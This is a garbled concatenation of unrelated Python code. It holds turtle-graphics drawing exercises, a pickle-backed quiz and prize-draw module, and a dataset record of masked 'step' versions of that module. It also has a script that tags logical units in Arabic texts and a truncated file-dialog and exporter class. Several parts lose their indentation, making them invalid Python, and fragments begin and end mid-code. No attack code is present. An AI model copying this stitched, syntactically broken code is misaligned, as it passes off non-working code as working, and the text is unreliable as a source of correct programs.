square(25, False, "blue", "black")
right(90)
forward(50)
right(90)
forward(25)
square(25, False, "blue", "black")
penup()
left(90)
forward(250)
left(90)
forward(400)
circlep(3, True, "yellow", "yellow")
mainloop()
# 5- the same scene as section 4, refactored into named helper functions
def door():
    rectangle(50, 100, True, "Brown")
    penup()
    right(90)
    forward(50)
    right(90)
    forward(50)
    right(90)
    forward(10)
    circle(.1, True, "Black")  # doorknob, via the shapes module's circle helper
def grass():
    fillcolor("Green")
    begin_fill()
    forward(300)
    left(90)
    forward(300)
    left(90)
    forward(1250)
    left(90)
    forward(300)
    left(90)
    forward(1000)
    end_fill()
def house():
rectangle(200, 450, True, "Red")
def roof():
fillcolor("brown")
begin_fill()
forward(293.717)
right(80)
forward(293.717)
right(140)
forward(450)
end_fill()
def window():
square(50, True, "blue", "Black")
right(90)
square(25, False, "blue", "black")
right(90)
forward(50)
right(90)
forward(25)
square(25, False, "blue", "black")
def sun():
circlep(3, True, "yellow", "yellow")
def sidewalk():
    fillcolor("grey")
    begin_fill()
    left(20)
    forward(400)
    left(75)
    forward(50)
    left(105)
    forward(400)
    left(75)
    forward(50)
    end_fill()
bgcolor("skyblue")
right(90)
penup()
forward(100)
right(90)
forward(200)
grass()
right(90)
pendown()
house()
left(180)
forward(200)
left(90)
penup()
forward(100)
right(90)
pendown()
door()
penup()
forward(40)
left(90)
forward(50)
pendown()
sidewalk()
right(5)
penup()
forward(200)
right(90)
forward(200)
right(90)
left(40)
pendown()
roof()
penup()
left(90)
forward(75)
left(90)
forward(75)
pendown()
window()
penup()
left(90)
forward(25)
right(90)
forward(200)
pendown()
window()
penup()
left(90)
forward(250)
left(90)
forward(400)
sun()
mainloop()
# 6- randomised "crayon" doodles
import random
def craystar():
color('red', 'yellow')
begin_fill()
for i in range(36):
forward(200)
left(170)
end_fill()
def craytriangle():
color('black', 'blue')
begin_fill()
i = 60
while i > 0:
forward(i)
right(120)
i -= 5
end_fill()
def craysquare():
    color("green", "Blue")
    begin_fill()
    for _ in range(12):
        # one fixed 60-unit square...
        for _ in range(4):
            forward(60)
            right(90)
        # ...then twelve random-length strokes
        for _ in range(12):
            forward(random.randint(1, 60))
            right(90)
    end_fill()
craysquare()
forward(50)
craysquare()
forward(50)
craysquare()
forward(50)
craystar()
forward(random.randint(1, 100))
right(random.randint(1, 90))
craytriangle()
forward(random.randint(1, 100))
right(random.randint(1, 90))
craystar()
forward(random.randint(1, 100))
right(random.randint(1, 90))
craytriangle()
forward(random.randint(1, 100))
right(random.randint(1, 90))
craystar()
forward(random.randint(1, 100))
right(random.randint(1, 90))
craytriangle()
mainloop()
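
# Note: section 6 is nondeterministic because of the random moves; calling
# random.seed(42) right after "import random" above would make the doodle
# reproducible between runs (the seed value is arbitrary).
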
# import os,sys
# BASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# sys.path.append(BASE_DIR)
from lib import common
from conf import settings
import random
import pickle
import os
import xlrd
import time
class Base:
    # persistence helpers: one pickle file per object, named by its id
    def save(self):
        file_path = r'%s/%s' % (self.DB_PATH, self.id)
        with open(file_path, 'wb') as f:
            pickle.dump(self, f)

    @classmethod
    def get_obj_by_id(cls, id):
        file_path = r'%s/%s' % (cls.DB_PATH, id)
        with open(file_path, 'rb') as f:
            return pickle.load(f)
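
# Usage sketch -- Base keeps one pickle file per object, named by its
# generated id; assuming the settings paths exist (Customer is defined below):
#
#   customer = Customer('alex', 'male', 30, '13100000000')
#   customer.save()                                # writes CUSTOMER_PATH/<id>
#   again = Customer.get_obj_by_id(customer.id)    # reads the same object back
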
class Subject(Base):
    DB_PATH = settings.QUESTION_PATH

    def __init__(self, type, comment, choice, right_res, score=5):
        self.id = common.create_id()
        self.type = type
        self.comment = comment
        self.choice = choice
        self.right_res = right_res
        self.score = score

    @classmethod
    def create_from_file(cls, src_file):
        # import questions from an Excel sheet: a row with a non-empty first
        # cell starts a new question, and the rows after it hold the four
        # choices, with a 1 in column 4 marking a correct answer
        data = xlrd.open_workbook(src_file)
        table = data.sheets()[0]
        subject = {
            'type': None,
            'comment': None,
            'choice': [],
            'res': set(),
        }
        for i in range(2, table.nrows):  # skip the first two (header) rows
            row = table.row_values(i)
            if len(subject['choice']) == 4:
                # four choices collected -> persist the finished question
                obj = cls(
                    subject['type'],
                    subject['comment'],
                    subject['choice'],
                    subject['res']
                )
                obj.save()
                subject = {
                    'type': None,
                    'comment': None,
                    'choice': [],
                    'res': set()
                }
            if row[0]:
                subject['type'] = row[0]
                subject['comment'] = row[1]
            else:
                subject['choice'].append(row[2])
                if row[3] == 1:
                    res_str = row[2].strip()
                    res = res_str[0].upper()
                    subject['res'].add(res)
        else:
            # for/else: runs once the loop ends, saving the last question
            obj = cls(
                subject['type'],
                subject['comment'],
                subject['choice'],
                subject['res']
            )
            obj.save()

    @classmethod
    def filter_question(cls):
        # draw three question files at random
        id_l = os.listdir(settings.QUESTION_PATH)
        r_id_l = random.sample(id_l, 3)
        return [cls.get_obj_by_id(id) for id in r_id_l]

    def __str__(self):
        return '<type: %s comment: %s>' % (self.type, self.comment)
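
# Sketch of how filter_question() might drive a quiz loop; the scoring logic
# below is illustrative and not part of this module:
#
#   total = 0
#   for q in Subject.filter_question():
#       print(q.comment, *q.choice, sep='\n')
#       answer = input('your answer: ').strip().upper()
#       if set(answer) == q.right_res:
#           total += q.score
#   print('score:', total)
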
class Customer(Base):
    DB_PATH = settings.CUSTOMER_PATH

    def __init__(self, name, sex, age, phone):
        self.id = common.create_id()
        self.name = name
        self.sex = sex
        self.age = age
        self.phone = phone


class Record(Base):
    DB_PATH = settings.RECORD_PATH

    def __init__(self, customer_id, record_list, total_score):
        self.id = common.create_id()
        self.customer_id = customer_id
        self.record_list = record_list
        self.total_score = total_score
        self.sub_time = time.strftime('%Y-%m-%d %X')

    @classmethod
    def get_obj_by_phone(cls, phone):
        # linear scan over every saved record, joining to Customer by id
        records = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))
        for record in records:
            customer_obj = Customer.get_obj_by_id(record.customer_id)
            if phone == customer_obj.phone:
                return record
class Prize(Base):
    DB_PATH = settings.PRIZE_PATH

    def __init__(self, name):
        self.id = common.create_id()
        self.name = name

    @classmethod
    def create_prize(cls):
        # interactively register prizes until the operator answers N
        while True:
            name = input('奖品名: ').strip()  # prompt: "Prize name: "
            if not name:
                continue
            obj = Prize(name)
            obj.save()
            choice = input('继续(Y/N)?: ').strip()  # prompt: "Continue (Y/N)?: "
            if choice in ('N', 'n'):
                break

    @classmethod
    def get_obj_by_name(cls, name):
        prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))
        for prize in prizes:
            if prize.name == name:
                return prize

    def __str__(self):
        return '<%s>' % self.name
class Customer2Prize(Base):
    # join object linking a customer to the prize they drew
    DB_PATH = settings.C2P_PATH

    def __init__(self, customer_id, prize_id):
        self.id = common.create_id()
        self.customer_id = customer_id
        self.prize_id = prize_id

    @classmethod
    def get_obj_by_customer_id(cls, customer_id):
        prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))
        for prize in prizes:
            if prize.customer_id == customer_id:
                return prize

    @classmethod
    def draw_prize(cls, customer_id):
        '''
        Prize odds, matching the draw below:
            1/100  欧洲十国游 (ten-country Europe tour)
            10/100 mac电脑 (Mac computer)
            50/100 珍藏版alex写真集一套 (collector's alex photo album set)
            39/100 egon签名一个 (one egon autograph)
        '''
        num = random.randint(1, 100)
        if num == 1:
            prize_name = '欧洲十国游'
        elif 1 < num <= 11:
            prize_name = 'mac电脑'
        elif 11 < num <= 61:
            prize_name = '珍藏版alex写真集一套'
        else:
            prize_name = 'egon签名一个'
        prize = Prize.get_obj_by_name(prize_name)
        obj = cls(customer_id, prize.id)
        obj.save()
        return prize_name
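
# Quick Monte Carlo check of the odds documented in draw_prize, bypassing
# persistence entirely (illustrative only):
#
#   from collections import Counter
#   counts = Counter()
#   for _ in range(100000):
#       n = random.randint(1, 100)
#       counts['tour' if n == 1 else 'mac' if n <= 11
#              else 'album' if n <= 61 else 'autograph'] += 1
#   print(counts)   # expect roughly 1% / 10% / 50% / 39%
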
if __name__ == '__main__':
# Subject.create_from_file(r'/Users/jieli/PycharmProjects/爬虫/t1/AnswerSys/test.xlsx')
# res=Subject.filter_question()
# for i in res:
# print(i)
Prize.create_prize()
Prize.get_obj_by_name(prize_name)\n obj = cls(customer_id, prize.id)\n obj.save()\n return prize_name\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Base:\n\n def save(self):\n file_path = '%s/%s' % (self.DB_PATH, self.id)\n pickle.dump(self, open(file_path, 'wb'))\n\n @classmethod\n def get_obj_by_id(cls, id):\n file_path = '%s/%s' % (cls.DB_PATH, id)\n return pickle.load(open(file_path, 'rb'))\n\n\nclass Subject(Base):\n DB_PATH = settings.QUESTION_PATH\n\n def __init__(self, type, comment, choice, right_res, score=5):\n self.id = common.create_id()\n self.type = type\n self.comment = comment\n self.choice = choice\n self.right_res = right_res\n self.score = score\n\n @classmethod\n def create_from_file(cls, src_file):\n data = xlrd.open_workbook(src_file)\n table = data.sheets()[0]\n subject = {'type': None, 'comment': None, 'choice': [], 'res': set()}\n for i in range(2, table.nrows):\n row = table.row_values(i)\n if len(subject['choice']) == 4:\n obj = cls(subject['type'], subject['comment'], subject[\n 'choice'], subject['res'])\n obj.save()\n subject = {'type': None, 'comment': None, 'choice': [],\n 'res': set()}\n if row[0]:\n subject['type'] = row[0]\n subject['comment'] = row[1]\n else:\n subject.setdefault('choice').append(row[2])\n if row[3] == 1:\n res_str = row[2].strip()\n res = res_str[0].upper()\n subject['res'].add(res)\n else:\n obj = cls(subject['type'], subject['comment'], subject['choice'\n ], subject['res'])\n obj.save()\n\n @classmethod\n def filter_question(cls):\n id_l = os.listdir(settings.QUESTION_PATH)\n r_id_l = random.sample(id_l, 3)\n return [cls.get_obj_by_id(id) for id in r_id_l]\n\n def __str__(self):\n return '<type: %s comment: %s>' % (self.type, self.comment)\n\n\nclass Customer(Base):\n DB_PATH = settings.CUSTOMER_PATH\n\n def __init__(self, name, sex, age, phone):\n self.id = common.create_id()\n self.name = name\n self.sex = sex\n self.age = age\n self.phone = phone\n\n\nclass Record(Base):\n DB_PATH = settings.RECORD_PATH\n\n def __init__(self, customer_id, record_list, total_score):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.record_list = record_list\n self.total_score = total_score\n self.sub_time = time.strftime('%Y-%m-%d %X')\n\n @classmethod\n def get_obj_by_phone(cls, phone):\n records = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for record in records:\n customer_obj = Customer.get_obj_by_id(record.customer_id)\n if phone == customer_obj.phone:\n return record\n\n\nclass Prize(Base):\n DB_PATH = settings.PRIZE_PATH\n\n def __init__(self, name):\n self.id = common.create_id()\n self.name = name\n\n @classmethod\n def create_prize(cls):\n while True:\n name = input('奖品名: ').strip()\n if not name:\n continue\n obj = Prize(name)\n obj.save()\n choice = input('继续(Y/N)?: ').strip()\n if choice == 'N' or choice == 'n':\n break\n\n @classmethod\n def get_obj_by_name(cls, name):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.name == name:\n return prize\n\n def __str__(self):\n return '<%s>' % self.name\n\n\nclass Customer2Prize(Base):\n DB_PATH = settings.C2P_PATH\n\n def __init__(self, customer_id, prize_id):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.prize_id = prize_id\n\n @classmethod\n def get_obj_by_customer_id(cls, customer_id):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.customer_id == customer_id:\n return prize\n\n @classmethod\n def draw_prize(cls, customer_id):\n \"\"\"\n 奖品概率:\n 0/100 欧洲十国游\n 1/100 iphone7 plus\n 10/100 mac电脑\n 50/100 珍藏版alex写真集一套\n 39/100 
egon签名一个\n \"\"\"\n num = random.randint(1, 100)\n if num == 1:\n prize_name = '欧洲十国游'\n if num > 1 and num <= 11:\n prize_name = 'mac电脑'\n if num > 11 and num <= 61:\n prize_name = '珍藏版alex写真集一套'\n if num > 61:\n prize_name = 'egon签名一个'\n prize = Prize.get_obj_by_name(prize_name)\n obj = cls(customer_id, prize.id)\n obj.save()\n return prize_name\n\n\n<mask token>\n",
"step-5": "# import os,sys\n# BASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# sys.path.append(BASE_DIR)\n\nfrom lib import common\nfrom conf import settings\nimport random\nimport pickle\nimport os\nimport xlrd\nimport time\n\nclass Base:\n def save(self):\n file_path=r'%s/%s' %(self.DB_PATH,self.id)\n pickle.dump(self,open(file_path,'wb'))\n\n @classmethod\n def get_obj_by_id(cls,id):\n file_path=r'%s/%s' %(cls.DB_PATH,id)\n return pickle.load(open(file_path,'rb'))\n\nclass Subject(Base):\n DB_PATH=settings.QUESTION_PATH\n def __init__(self,type,comment,choice,right_res,score=5):\n self.id=common.create_id()\n self.type=type\n self.comment=comment\n self.choice=choice\n self.right_res=right_res\n self.score=score\n\n\n @classmethod\n def create_from_file(cls,src_file):\n data=xlrd.open_workbook(src_file)\n table=data.sheets()[0]\n subject={\n 'type':None,\n 'comment':None,\n 'choice':[],\n 'res':set(),\n }\n for i in range(2,table.nrows):\n row=table.row_values(i)\n if len(subject['choice'])==4:\n obj=cls(\n subject['type'],\n subject['comment'],\n subject['choice'],\n subject['res']\n )\n obj.save()\n subject={\n 'type':None,\n 'comment':None,\n 'choice':[],\n 'res':set()\n }\n if row[0]:\n subject['type']=row[0]\n subject['comment']=row[1]\n else:\n subject.setdefault('choice').append(row[2])\n if row[3] == 1:\n res_str=row[2].strip()\n res=res_str[0].upper()\n subject['res'].add(res)\n\n else:\n obj=cls(\n subject['type'],\n subject['comment'],\n subject['choice'],\n subject['res']\n )\n obj.save()\n\n @classmethod\n def filter_question(cls):\n id_l=os.listdir(settings.QUESTION_PATH)\n r_id_l=random.sample(id_l,3)\n return [cls.get_obj_by_id(id) for id in r_id_l]\n\n def __str__(self):\n return '<type: %s comment: %s>' %(self.type,self.comment)\n\n\nclass Customer(Base):\n DB_PATH=settings.CUSTOMER_PATH\n def __init__(self,name,sex,age,phone):\n self.id=common.create_id()\n self.name=name\n self.sex=sex\n self.age=age\n self.phone=phone\n\n\nclass Record(Base):\n DB_PATH=settings.RECORD_PATH\n def __init__(self,customer_id,record_list,total_score):\n self.id=common.create_id()\n self.customer_id=customer_id\n self.record_list=record_list\n self.total_score=total_score\n self.sub_time=time.strftime('%Y-%m-%d %X')\n\n @classmethod\n def get_obj_by_phone(cls,phone):\n records=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for record in records:\n customer_obj=Customer.get_obj_by_id(record.customer_id)\n if phone == customer_obj.phone:\n return record\n\n\nclass Prize(Base):\n DB_PATH=settings.PRIZE_PATH\n def __init__(self,name):\n self.id=common.create_id()\n self.name=name\n\n @classmethod\n def create_prize(cls):\n while True:\n name=input('奖品名: ').strip()\n if not name:continue\n obj=Prize(name)\n obj.save()\n choice=input('继续(Y/N)?: ').strip()\n if choice == 'N' or choice == 'n':\n break\n\n @classmethod\n def get_obj_by_name(cls,name):\n prizes=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.name == name:\n return prize\n\n def __str__(self):\n return '<%s>' %self.name\n\nclass Customer2Prize(Base):\n DB_PATH=settings.C2P_PATH\n def __init__(self,customer_id,prize_id):\n self.id=common.create_id()\n self.customer_id=customer_id\n self.prize_id=prize_id\n\n @classmethod\n def get_obj_by_customer_id(cls,customer_id):\n prizes=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.customer_id == customer_id:\n return prize\n\n @classmethod\n def 
draw_prize(cls,customer_id):\n '''\n 奖品概率:\n 0/100 欧洲十国游\n 1/100 iphone7 plus\n 10/100 mac电脑\n 50/100 珍藏版alex写真集一套\n 39/100 egon签名一个\n '''\n num=random.randint(1,100)\n\n if num == 1:\n # 1/100 iphone7 plus\n prize_name='欧洲十国游'\n\n if num >1 and num <=11:\n # mac电脑\n prize_name='mac电脑'\n if num > 11 and num <=61:\n # 珍藏版alex写真集一套\n prize_name='珍藏版alex写真集一套'\n if num > 61:\n # egon签名一个\n prize_name='egon签名一个'\n prize=Prize.get_obj_by_name(prize_name)\n obj=cls(customer_id,prize.id)\n obj.save()\n return prize_name\n\nif __name__ == '__main__':\n\n # Subject.create_from_file(r'/Users/jieli/PycharmProjects/爬虫/t1/AnswerSys/test.xlsx')\n # res=Subject.filter_question()\n # for i in res:\n # print(i)\n\n Prize.create_prize()",
"step-ids": [
21,
23,
24,
27,
30
]
}
|
[
21,
23,
24,
27,
30
] |
# inserting logical unit ids for splitting texts into logical chunks
import re
import os
splitter = "#META#Header#End#"
def logical_units(file):
ar_ra = re.compile("^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$")
with open(file, "r", encoding="utf8") as f1:
book = f1.read()
# splitter test
if splitter in book:
# logical units
        log_ids = re.findall(r"\n#\d+#", book)
if len(log_ids) > 0:
print("\tthe text already have %d logical units of this length" % len(log_ids))
pass
else:
# insert logical unit ids
new_data = []
head = book.split(splitter)[0]
text = book.split(splitter)[1]
token_count = 0
data = re.findall(r"\w+|\W+", text)
word_len = len(str(len(data)))
data_len = len(data)
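            # unit ids are zero-padded to the digit width of len(data), an
            # upper bound on the token count, presumably so that the ids
            # sort correctly as plain strings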
for i in range(0, data_len):
if "\n#" in data[i]:
if "Page" in data[i + 1]:# or ar_token_cnt(ar_ra, data[i + 1]) <= 0:
new_data.append(data[i])
else:
last = data[i].rfind("#")
token_cnt_str = str(token_count + 1)
if len(token_cnt_str) < word_len:
tmp_cnt = token_cnt_str.zfill(word_len)
else:
tmp_cnt = token_cnt_str
tmp = data[i][:last] + "#" + tmp_cnt + data[i][last:]
new_data.append(tmp)
elif ar_token_cnt(ar_ra, data[i]):
token_count += 1
new_data.append(data[i])
else:
new_data.append(data[i])
log_text = "".join(new_data)
log_text = head + splitter + log_text
with open(file + "_logical", "w", encoding="utf8") as f:
f.write(log_text)
else:
print("The file is missing the splitter!")
print(file)
def ar_token_cnt(ar_ra, text):
return sum(ar_ra.search(t) is not None for t in re.findall(r"\w+|\W+", text))
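# A minimal, hedged demo of ar_token_cnt (this helper and its sample string
# are illustrative and not part of the original module): only runs made
# entirely of Arabic characters are counted; Latin words and whitespace
# are skipped.
def _demo_ar_token_cnt():
    ar_ra = re.compile("^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$")
    assert ar_token_cnt(ar_ra, "كتاب test كتاب") == 2  # two Arabic runs, "test" ignored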
# process all texts in OpenITI
def process_all(folder):
exclude = (["OpenITI.github.io", "Annotation", "_maintenance", "i.mech"])
for root, dirs, files in os.walk(folder):
# print("root: ",root)
dirs[:] = [d for d in dirs if d not in exclude]
# print("dir: ",dirs)
for file in files:
if re.search("^\d{4}\w+\.\w+\.\w+-ara\d$", file):
logical_units(os.path.join(root, file))
# return
# input()
# /media/rostam/Seagate Backup Plus Drive
# process_all("/home/rostam/projs/KITAB/test")
# print("Done!")
|
normal
|
{
"blob_id": "5c001303962315afe2512eb307376f6f7a883cf9",
"index": 6831,
"step-1": "<mask token>\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-2": "<mask token>\n\n\ndef logical_units(file):\n ar_ra = re.compile(\n '^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$'\n )\n with open(file, 'r', encoding='utf8') as f1:\n book = f1.read()\n if splitter in book:\n log_ids = re.findall('\\n#\\\\d+#', book)\n if len(log_ids) > 0:\n print(\n '\\tthe text already have %d logical units of this length' %\n len(log_ids))\n pass\n else:\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n data = re.findall('\\\\w+|\\\\W+', text)\n word_len = len(str(len(data)))\n data_len = len(data)\n for i in range(0, data_len):\n if '\\n#' in data[i]:\n if 'Page' in data[i + 1]:\n new_data.append(data[i])\n else:\n last = data[i].rfind('#')\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + '#' + tmp_cnt + data[i][last\n :]\n new_data.append(tmp)\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n log_text = ''.join(new_data)\n log_text = head + splitter + log_text\n with open(file + '_logical', 'w', encoding='utf8') as f:\n f.write(log_text)\n else:\n print('The file is missing the splitter!')\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall('\\\\w+|\\\\W+',\n text))\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-3": "<mask token>\nsplitter = '#META#Header#End#'\n\n\ndef logical_units(file):\n ar_ra = re.compile(\n '^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$'\n )\n with open(file, 'r', encoding='utf8') as f1:\n book = f1.read()\n if splitter in book:\n log_ids = re.findall('\\n#\\\\d+#', book)\n if len(log_ids) > 0:\n print(\n '\\tthe text already have %d logical units of this length' %\n len(log_ids))\n pass\n else:\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n data = re.findall('\\\\w+|\\\\W+', text)\n word_len = len(str(len(data)))\n data_len = len(data)\n for i in range(0, data_len):\n if '\\n#' in data[i]:\n if 'Page' in data[i + 1]:\n new_data.append(data[i])\n else:\n last = data[i].rfind('#')\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + '#' + tmp_cnt + data[i][last\n :]\n new_data.append(tmp)\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n log_text = ''.join(new_data)\n log_text = head + splitter + log_text\n with open(file + '_logical', 'w', encoding='utf8') as f:\n f.write(log_text)\n else:\n print('The file is missing the splitter!')\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall('\\\\w+|\\\\W+',\n text))\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-4": "import re\nimport os\nsplitter = '#META#Header#End#'\n\n\ndef logical_units(file):\n ar_ra = re.compile(\n '^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$'\n )\n with open(file, 'r', encoding='utf8') as f1:\n book = f1.read()\n if splitter in book:\n log_ids = re.findall('\\n#\\\\d+#', book)\n if len(log_ids) > 0:\n print(\n '\\tthe text already have %d logical units of this length' %\n len(log_ids))\n pass\n else:\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n data = re.findall('\\\\w+|\\\\W+', text)\n word_len = len(str(len(data)))\n data_len = len(data)\n for i in range(0, data_len):\n if '\\n#' in data[i]:\n if 'Page' in data[i + 1]:\n new_data.append(data[i])\n else:\n last = data[i].rfind('#')\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + '#' + tmp_cnt + data[i][last\n :]\n new_data.append(tmp)\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n log_text = ''.join(new_data)\n log_text = head + splitter + log_text\n with open(file + '_logical', 'w', encoding='utf8') as f:\n f.write(log_text)\n else:\n print('The file is missing the splitter!')\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall('\\\\w+|\\\\W+',\n text))\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-5": "# inserting logical unit ids for splitting texts into logical chunks\n\nimport re\nimport os\n\nsplitter = \"#META#Header#End#\"\n\n\ndef logical_units(file):\n ar_ra = re.compile(\"^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$\")\n\n with open(file, \"r\", encoding=\"utf8\") as f1:\n book = f1.read()\n\n # splitter test\n if splitter in book:\n # logical units\n log_ids = re.findall(\"\\n#\\d+#\", book)\n if len(log_ids) > 0:\n print(\"\\tthe text already have %d logical units of this length\" % len(log_ids))\n pass\n else:\n # insert logical unit ids\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n\n data = re.findall(r\"\\w+|\\W+\", text)\n word_len = len(str(len(data)))\n data_len = len(data)\n\n for i in range(0, data_len):\n if \"\\n#\" in data[i]:\n if \"Page\" in data[i + 1]:# or ar_token_cnt(ar_ra, data[i + 1]) <= 0:\n new_data.append(data[i])\n else:\n last = data[i].rfind(\"#\")\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + \"#\" + tmp_cnt + data[i][last:]\n new_data.append(tmp)\n\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n\n log_text = \"\".join(new_data)\n log_text = head + splitter + log_text\n\n with open(file + \"_logical\", \"w\", encoding=\"utf8\") as f:\n f.write(log_text)\n\n else:\n print(\"The file is missing the splitter!\")\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall(r\"\\w+|\\W+\", text))\n\n\n# process all texts in OpenITI\n\n\ndef process_all(folder):\n exclude = ([\"OpenITI.github.io\", \"Annotation\", \"_maintenance\", \"i.mech\"])\n for root, dirs, files in os.walk(folder):\n # print(\"root: \",root)\n dirs[:] = [d for d in dirs if d not in exclude]\n # print(\"dir: \",dirs)\n for file in files:\n if re.search(\"^\\d{4}\\w+\\.\\w+\\.\\w+-ara\\d$\", file):\n logical_units(os.path.join(root, file))\n # return\n # input()\n\n\n# /media/rostam/Seagate Backup Plus Drive\n# process_all(\"/home/rostam/projs/KITAB/test\")\n\n# print(\"Done!\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class CSVExporter:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SaveFileDialog(FileDialog):
<|reserved_special_token_0|>
def __init__(self, ctrl):
super().__init__(ctrl, storage='save')
def _defaultpath(ext, bopen):
assert not bopen
pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()
]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, 'save', ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa / Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:
] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = 'xlsx:*.xlsx'
self.title = 'Export plot data to excel'
def store(self, *_):
"""store the path"""
return self.__store(*_)
class CSVExporter:
"""exports all to csv"""
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:
"""creates the widget"""
